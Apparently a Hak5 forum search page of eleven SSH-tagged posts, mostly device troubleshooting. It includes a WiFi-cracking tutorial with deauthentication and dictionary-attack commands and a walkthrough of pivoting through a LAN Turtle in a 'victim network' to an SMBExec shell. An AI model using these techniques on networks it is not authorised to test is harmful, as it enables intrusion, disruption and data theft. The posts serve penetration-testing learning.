Search the Community

Showing results for tags 'ssh'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple / Jasager
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • Mark V
    • Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • Mark I, II, III
  • Active Projects
    • Bash Bunny
    • Lan Turtle
    • USB Rubber Ducky
    • SDR - Software Defined Radio
    • Community Projects
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Other Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 11 results

  1. Welcome to part three of my tutorial series. I will be showing you How to Crack WiFi. Requirements: SSH WiFi Card with Monitor Mode Aircrack Suite Dictionary mdk3 (Optional) So if you've been following along you should now be able to sniff packets from a wireless card in monitor mode. I'll briefly explain what we need to do. We need to start recording just like we did before with airodump. While that is running, we need to also do a deauthentication attack at the same time. Optionally, we may may strip the file down to save space. Then we can run a bruteforce attack using the data we just collected. First we need to start monitor mode and start capturing as shown on part two. ifconfig wlan1 up airmon-ng check kill airmon-ng start wlanX airodump-ng -w MySecondDump wlanXmon Now that we have that running in the background, capturing all the network traffic, we need to work on capturing a 4-way handshake. So what's a 4-way handshake anyways? If we can record this entire process using airodump, we will have all the information we need to perform an attack to get the actual password. The easiest way of doing this is simply to let airodump capture and record packets. Eventually someone will come along and connect to the network, then we will have the handshake. So at this point in time you should have airodump running and collecting packets. In order to check if it has captured a 4-way handshake or not, simply run this command: aircrack-ng MySecondDump-01.cap (It automatically adds an 01 to the end of the name, to prevent to files from having the same name.) Either you didn't wait long enough (Nobody connected to the network while it was capturing) Or somebody connected to the network and it was successfully recorded. Now I realize that sitting there and waiting on someone to connect to the network might not be the funnest thing to do, or the fastest. So you can GREATLY speed this up, as long as there is already a wireless device on the network. The way we do this is by a deauthentication attack. Basically we force their devices to reconnect to the network, so we can capture the handshake when they do. I find the best way to do this is with a tool called mdk3. This is a part of Kali, but it's not built in on the pineapple. To install it on the pineapple, simply run: opkg install mdk3 Now that we have mdk3, we can use it to run this attack. There are two ways to run this attack. One way is by running the attack against anything, basically creating a WiFi jammer. The second (And nicer) way, it to target a device and attack it. To do it the first way, you will simply use: mdk3 wlanXmon d -c mdk3 is the tools wlanXmon is the wifi card to use d tells it to do a deauthitication attack -c tells it to run the attack on all channels If you would like to do it the second way, you need to know the targets MAC address. Once you have this address, save it in a text file named Targets.txt Then the command would be: mdk3 wlanXmon d -b Targets.txt -c By either waiting long enough, or by using this trick (Or both) you will eventually capture the handshake. Now we can use it to bruteforce the wifi password. This is where the dictionary comes in. You're going to need a password list. The ways this works is that it tests every single password in the list, and if one of them is right, it will tell you. A good place to find them is here. Now that we have both a .cap file containing the 4-Way handshake and a dictionary, we can start the attack.: aircrack-ng MySecondDump.cap -w Dictionary.txt It will then ask you which network you would like to attack. Simply type the number to the left, then press enter. Now it will go though every password in the list until either it finds the password, or it goes though every password and it's not on the list. A few notes. The first one is that the speed of the crack depends on the capabilities of you computer. Using Both my CPU and GPU, my computer takes about 3 hours to test my massive 13Gb list, which contains just under one billion passwords. (i7 6700 3.4gh, Nvidia GTX960, 16gbs RAM) If you have a computer less powerfull, you'll want to look for smaller, more optimized lists. Things like the most commonly used passwords. Another note is that using the mdk3 toll without a target is extremely disruptive, please don't do it this way. It will kick everyone in range off of whatever wifi they are on, the only reason I even include it here is so you don't go around doing it unknowingly. Also, aircrack only uses your computers CPU, so having a good video card will not make it run faster. I will create another tutorial later showing how to use a few alternatives. Just as deauthentication without mdk3, and using tshark, cowpatty, and pyrit to verify handshakes instead of aircrack. And also how to capture and strip your .cap files at the same time. It's 3AM on December 25th, so I will be out with family most of the day tomorrow, odds are I won't have a chance to right part four until Saturday.
  2. I want to automate an SSH login. I was looking at sshpass or expect. But I haven't been able to find a working example of either. Anyboy use either of these? Also something of note. I don't know the hostname of the remote machine yet. I'm trying to get that in an automated way as well. I've tried raceroute, smbclient, nslookup, host, arp, and finger. Expect needs to expect user@host before it can send any commands over SSH but I don't know the hostname at this point.
  3. So I received my Wifi Pineapple NANO a few days ago and it worked fine on first try, I got on to the web interface and reached the point of updating the firmware and I think I may have messed up. Now whenever I plug the nano in, the light flashes twice holds for about 5 seconds then turns off, I can't ssh to it, I can't get the web interface and I can't see it as a wifi network. Any advice?
  4. When running the following payload: LED G ATTACKMODE RNDIS_ETHERNET And try to SSH into the bunny ( with Putty. As root I always get 'Access Denied' I've change the default password using attackmode serial but that password is not working for SSH. I even set it back to the default hak5bunny password, but still no joy. What am I missing here?
  5. I am a complete noob at this, so I could be doing something completely wrong. Just got the Lan turtle today. Plugged it in with a phone charger meeting minimium power requirements and connected it to a PC with an OTG ethernet-to-USB adapter. Had to setup the network connection manually (on Ubuntu 16.10) with: IP -, Netmask -, Gateway -, DNS Servers - and After that, I check the connection with ifconfig and everything appears to be OK, so I finally tried connecting to the Lan Turtle. :$ ssh root@ Permission denied (publickey). I have setup openssh on a few of my PCs for ssh-key authentication only, but this the first time using the Lan Turtle. Also realised I cannot browse on the internet while it is connected, even with wifi and another wired connection available. I have searched around to see if there is a fix for this, but I canot find anything.
  6. I have followed Hak5's YouTube instructions in LAN turtle basics of how to setup auto SSH. I have a remote server. SSH works if the lanturtle is plugged into the device sshing into it. However auto ssh does not work unless I type iptables -I INPUT 1 -i eth1 -p tcp --dport 22 -j ACCEPT But if I reboot the LAN turtle cannot ssh into it from my remote server, unless I rerun the iptables command Putting iptables -I INPUT 1 -i eth1 -p tcp --dport 22 -j ACCEPT in /etc/firewall.user does not help any ideas?
  7. I have just done the first setup of my LAN turtle following the instructions provided in YouTube video. I then went to ssh into my LAN turtle. I am 99% percent sure the password I typed is correct. but I get Permission denied (publickey, password, keyboard-interactive). I have never seen the keyboard-interactive part before. Can I access my LAN turtle without removing the screws under the sticker as this reuins the look? Thankyou luke-spademan
  8. I've been having some trouble with my router lately. I'm trying to get everything set up for autossh. If I'm logged in to my router and try to connect to my device, I get this error: ( is the Nano) However, if I'm on my Nano and try connecting to my router, it works perfectly. So it's like a one way connection. Both devices have all the proper keys added, so no passwords are needed. My router is using SSH-2.0 Dropbear 2014.63, and the pineapple of course uses SSH-2.0 OpenSSH 6.8. The firmware of the router is DD-WRT-v24 sp2 std P.S. I posted the question here as I don't think it's anything pineapple-specific. Feel free to move it if needed.
  9. Hey guys, i was checking the System Log as I saw the following entries: auth.err sshd[2499]: error: Could not load host key: /etc/ssh/ssh_host_ecdsa_key auth.err sshd[2499]: error: Could not load host key: /etc/ssh/ssh_host_ed25519_key I recently made a fresh factory reset and update to 1.0.6. SSH into the pineapple is possible, but I wonder why the keys were not generated. Anyone else with this error message?
  10. Hello! After reading about the LanTurtle and watching the videos for it i have a few questions about the product before i purchase it. Lets make the example that i have successfully installed the LanTurtle on a targeted computer. I've got remote SSH connection to Turtle and a meterpreter session active. As i've understood correctly the lanturtle is the only equipment on the network i have access to and not even the computer it is attached to! So if i want to get access to computers on the network i could use the meterpreter session and launch attacks to the computers from the turtle and get a new meterpreter into the new computer and work from there? If there is a vulnerable computer on the network of course. Can the Turtle which is connected to the network also visit network folders/disks? Let's say there is a computer/Server sharing files and its accessible by anyone on the network. Can the Turtle access these network folders if they are open for the network the Turtle is connected to and transfer these files to the SSH server forexample? I'm pretty new to metasploit but still learning how it works and how it would work out with the LanTurtle the practical way. Also a great tool when i perform pentest for the local companies (FYI: legal and paid work, i don't plan to abuse this if someone were to ask ) i mostly do physical testing and assesment and this would be a really good tool for me as my other co-worker do the software/web part.
  11. Hi all! Just wanted to share something that might help other Lan Turtlers out there. One of the things I wanted to do with my lan turtle was to pivot my tools from my local box through the turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your turtle. My setup: [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network] I ran into trouble trying to figure out how to setup an SSH proxychain to it...found this article which worked right away: I used the first line, which was this command: ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p machine-b" machine-c Here, machine-b would be the username@ip_of_VPS_in_cloud and machine-c would be the turtle, which should be root@localhost -p 2222 By replacing the "$PORT" with whatever you want (I used 9050, the default in the proxychains.conf), it would work flawlessly. Basically, what we are doing here is creating a Socks Proxy through SSH that goes through our VPS in the cloud, and then logs into the turtle (which already connects back to that VPS, through AutoSSH). With this tunnel, all you need to do is open up your proxychains.conf (/etc/proxychains.conf) and edit the last line to reflect the port you used. After that, you are all set! In Kali, just prepend "proxychains" before the tool you want to use.....for example! I wanted to be able to use Veil-Pillage from my local Kali box to get a SMBExec shell (because I already had credentials). So, by setting up the tunnel above, I ran root@kali#proxychains ./Veil-Pillage Which would take me to dialogue screen, I chose number 25, set my target (which was, a win7 VM) and my creds, and just hit ran! Veil-Pillage: post-explotation framework | [Version]: 1.1.2 ========================================================================= [Web]: | [Twitter]: @VeilFramework ========================================================================= [*] Executing module: Smbexec Shell... [*] Type 'exit' to exit the shell Trying protocol 445/SMB... Creating service SystemDiag... |S-chain|-<>-***.***.***.***-<><>-<><>-OK [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32> And there you have it!! I thought this should be useful for everyone out there. Another way of doing it is to use your metasploit/armitage instance in the VPS, use the meterpreter module, setup the Socks4 proxy, and then setup proxychains to reflect your VPS instance. Don't forget to add route! Let me know your thoughts! TL;DR: SSH socks proxy -- root@kali#ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p VPS-in-cloud" turtle-in-VPS then change proxychains.conf, then "proxychains tool"